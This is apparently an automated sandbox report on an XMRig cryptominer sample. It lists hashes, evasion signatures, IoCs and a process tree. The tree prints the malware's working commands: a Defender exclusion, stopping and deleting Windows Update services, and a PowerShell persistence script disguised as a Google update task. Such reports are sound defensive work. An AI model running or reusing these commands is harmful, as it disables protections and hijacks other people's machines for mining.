xmrig | f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919

Analysis

max time kernel
299s
max time network
300s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
03/12/2022, 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Size

6.7MB
MD5

57bc38aa4830968ccfd83ddf9417c93f
SHA1

31b3dc9a13f1a9fffc2eeb272494bf60fc385338
SHA256

f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919
SHA512

26f999a4748cb2a7e2b04bf08eef66e8a143927e8a7328592b812243a8e0ec16f91bb9aa353b6f5df9c7bd0f71503521f1e15ad4337a46517795e4163b36a9c7
SSDEEP

196608:2rL58hRFrt1wspQDI9mW4VQ7JEuyHzqFMZMCO:6E3J6spIMmW73JMZMCO

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1300 created 1212	1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe	14
PID 1300 created 1212	1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe	14
PID 1300 created 1212	1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe	14
PID 1300 created 1212	1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe	14
PID 1300 created 1212	1300	Process not Found	14
PID 2008 created 1212	2008	updater.exe	14
PID 2008 created 1212	2008	updater.exe	14
PID 2008 created 1212	2008	updater.exe	14
PID 2008 created 1212	2008	updater.exe	14
PID 2008 created 1212	2008	updater.exe	14
PID 1804 created 1212	1804	conhost.exe	14
PID 2008 created 1212	2008	updater.exe	14
PID 2008 created 1212	2008	updater.exe	14

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/760-146-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/760-147-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Executes dropped EXE 1 IoCs

pid	Process
2008	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/760-146-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/760-147-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
1448	taskeng.exe

Themida packer 17 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/1300-54-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-55-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-56-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-57-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-58-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-66-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/memory/1300-93-0x000000013F260000-0x000000013FE9D000-memory.dmp	themida
behavioral1/files/0x000c0000000122f3-99.dat	themida
behavioral1/files/0x000c0000000122f3-101.dat	themida
behavioral1/memory/2008-102-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/memory/2008-103-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/memory/2008-104-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/memory/2008-105-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/memory/2008-107-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/memory/2008-137-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida
behavioral1/files/0x000c0000000122f3-140.dat	themida
behavioral1/memory/2008-144-0x000000013FD90000-0x00000001409CD000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	cmd.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Process not Found
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
2008	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2008 set thread context of 1804	2008	updater.exe	82
PID 2008 set thread context of 760	2008	updater.exe	85

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	Process not Found
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1992	sc.exe
288	sc.exe
592	sc.exe
1676	sc.exe
1264	sc.exe
968	sc.exe
1424	sc.exe
524	sc.exe
1736	sc.exe
984	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2036	schtasks.exe
888	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e09c9aaa6f07d901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
932	powershell.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1300	f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
1996	cmd.exe
1300	Process not Found
1300	Process not Found
1868	Process not Found
2008	updater.exe
2008	updater.exe
672	powershell.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
1092	powershell.exe
2008	updater.exe
2008	updater.exe
1804	conhost.exe
1804	conhost.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
2008	updater.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe
760	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	932	powershell.exe
Token: SeShutdownPrivilege	276	powercfg.exe
Token: SeShutdownPrivilege	2032	powercfg.exe
Token: SeShutdownPrivilege	984	sc.exe
Token: SeDebugPrivilege	1996	cmd.exe
Token: SeShutdownPrivilege	1332	powercfg.exe
Token: SeDebugPrivilege	1868	Process not Found
Token: SeDebugPrivilege	672	powershell.exe
Token: SeShutdownPrivilege	1376	powercfg.exe
Token: SeShutdownPrivilege	1732	powercfg.exe
Token: SeShutdownPrivilege	1520	powercfg.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeShutdownPrivilege	1928	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1360	WMIC.exe
Token: SeSecurityPrivilege	1360	WMIC.exe
Token: SeTakeOwnershipPrivilege	1360	WMIC.exe
Token: SeLoadDriverPrivilege	1360	WMIC.exe
Token: SeSystemtimePrivilege	1360	WMIC.exe
Token: SeBackupPrivilege	1360	WMIC.exe
Token: SeRestorePrivilege	1360	WMIC.exe
Token: SeShutdownPrivilege	1360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1360	WMIC.exe
Token: SeUndockPrivilege	1360	WMIC.exe
Token: SeManageVolumePrivilege	1360	WMIC.exe
Token: SeLockMemoryPrivilege	760	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1556 wrote to memory of 276	1556	cmd.exe	32
PID 1556 wrote to memory of 276	1556	cmd.exe	32
PID 1556 wrote to memory of 276	1556	cmd.exe	32
PID 1556 wrote to memory of 2032	1556	cmd.exe	36
PID 1556 wrote to memory of 2032	1556	cmd.exe	36
PID 1556 wrote to memory of 2032	1556	cmd.exe	36
PID 1140 wrote to memory of 968	1140	cmd.exe	40
PID 1140 wrote to memory of 968	1140	cmd.exe	40
PID 1140 wrote to memory of 968	1140	cmd.exe	40
PID 1556 wrote to memory of 984	1556	cmd.exe	75
PID 1556 wrote to memory of 984	1556	cmd.exe	75
PID 1556 wrote to memory of 984	1556	cmd.exe	75
PID 1140 wrote to memory of 1992	1140	cmd.exe	39
PID 1140 wrote to memory of 1992	1140	cmd.exe	39
PID 1140 wrote to memory of 1992	1140	cmd.exe	39
PID 1556 wrote to memory of 1332	1556	cmd.exe	38
PID 1556 wrote to memory of 1332	1556	cmd.exe	38
PID 1556 wrote to memory of 1332	1556	cmd.exe	38
PID 1140 wrote to memory of 288	1140	cmd.exe	41
PID 1140 wrote to memory of 288	1140	cmd.exe	41
PID 1140 wrote to memory of 288	1140	cmd.exe	41
PID 1140 wrote to memory of 1424	1140	cmd.exe	42
PID 1140 wrote to memory of 1424	1140	cmd.exe	42
PID 1140 wrote to memory of 1424	1140	cmd.exe	42
PID 1140 wrote to memory of 592	1140	cmd.exe	43
PID 1140 wrote to memory of 592	1140	cmd.exe	43
PID 1140 wrote to memory of 592	1140	cmd.exe	43
PID 1140 wrote to memory of 780	1140	cmd.exe	44
PID 1140 wrote to memory of 780	1140	cmd.exe	44
PID 1140 wrote to memory of 780	1140	cmd.exe	44
PID 1996 wrote to memory of 2036	1996	cmd.exe	49
PID 1996 wrote to memory of 2036	1996	cmd.exe	49
PID 1996 wrote to memory of 2036	1996	cmd.exe	49
PID 1140 wrote to memory of 1880	1140	cmd.exe	48
PID 1140 wrote to memory of 1880	1140	cmd.exe	48
PID 1140 wrote to memory of 1880	1140	cmd.exe	48
PID 1140 wrote to memory of 924	1140	cmd.exe	46
PID 1140 wrote to memory of 924	1140	cmd.exe	46
PID 1140 wrote to memory of 924	1140	cmd.exe	46
PID 1140 wrote to memory of 1184	1140	cmd.exe	45
PID 1140 wrote to memory of 1184	1140	cmd.exe	45
PID 1140 wrote to memory of 1184	1140	cmd.exe	45
PID 1140 wrote to memory of 1688	1140	cmd.exe	47
PID 1140 wrote to memory of 1688	1140	cmd.exe	47
PID 1140 wrote to memory of 1688	1140	cmd.exe	47
PID 1868 wrote to memory of 296	1868	Process not Found	52
PID 1868 wrote to memory of 296	1868	Process not Found	52
PID 1868 wrote to memory of 296	1868	Process not Found	52
PID 1448 wrote to memory of 2008	1448	taskeng.exe	54
PID 1448 wrote to memory of 2008	1448	taskeng.exe	54
PID 1448 wrote to memory of 2008	1448	taskeng.exe	54
PID 1708 wrote to memory of 984	1708	cmd.exe	75
PID 1708 wrote to memory of 984	1708	cmd.exe	75
PID 1708 wrote to memory of 984	1708	cmd.exe	75
PID 1476 wrote to memory of 1376	1476	cmd.exe	61
PID 1476 wrote to memory of 1376	1476	cmd.exe	61
PID 1476 wrote to memory of 1376	1476	cmd.exe	61
PID 1708 wrote to memory of 1264	1708	cmd.exe	74
PID 1708 wrote to memory of 1264	1708	cmd.exe	74
PID 1708 wrote to memory of 1264	1708	cmd.exe	74
PID 1476 wrote to memory of 1732	1476	cmd.exe	62
PID 1476 wrote to memory of 1732	1476	cmd.exe	62
PID 1476 wrote to memory of 1732	1476	cmd.exe	62
PID 1708 wrote to memory of 1736	1708	cmd.exe	73

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1212
- C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe
  "C:\Users\Admin\AppData\Local\Temp\f6d3d3cf23901166e2adec4f7ea32d5c424914d86d0aef53b580b3c678d88919.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:932
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1556
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:276
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:984
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1140
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1992
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:968
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:288
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1424
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:592
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:780
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1184
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:924
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1688
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:1996
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zneglfoyv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  PID:1868
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#myhhgfd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1092
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:888
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1708
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:1556
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe kfleahquehi
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1804
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe qjosysdnolwwzbsc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqwn6vckAqS7SwZBHmWfSXaoYPV5nF5hTjq2epH65KwNo9lXjxaX7KyBDQ9wTlDmUyUC+oUs02ckKl1ssjG3/geDSTbyqoDAGDRxVlNzsfIHK9jTKb41kkt5n5KU3N0Quo/PGA9zlisO7lVe8SE+rkGyntU1fmaH3axIruRYdl/jwpgiyjxwLGtc6v6EqhF8Y//wqc4DLjxoML3CNLKlunEmrYb4h2eim5E/v5ur7MeJhAgSNi+g/oyV2b3B6L2NmJWK44j/1PmtzJdtTTjUwWRqlta/ahTq/+dpQPXgFJnSzXSrMxkKo/DX1UjiEO6EZkutvT8vEDAT5kxHv9ZLCKlKkJ3uqdAFqloYaVbbwogLJFee/cR8Mos6dW3oZ4LvaMe4O0ga8CszjkHqad5ywliajU1jFFEA4in7m8Y2aWveg=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:760

C:\Windows\system32\taskeng.exe
taskeng.exe {2A33E26E-AF3A-40C1-A138-C7B6D243590F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2008

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
1⤵
PID:1816

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
1⤵
PID:1724

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
1⤵
PID:1180

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:1728

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
1⤵
PID:1452

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:1676

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520

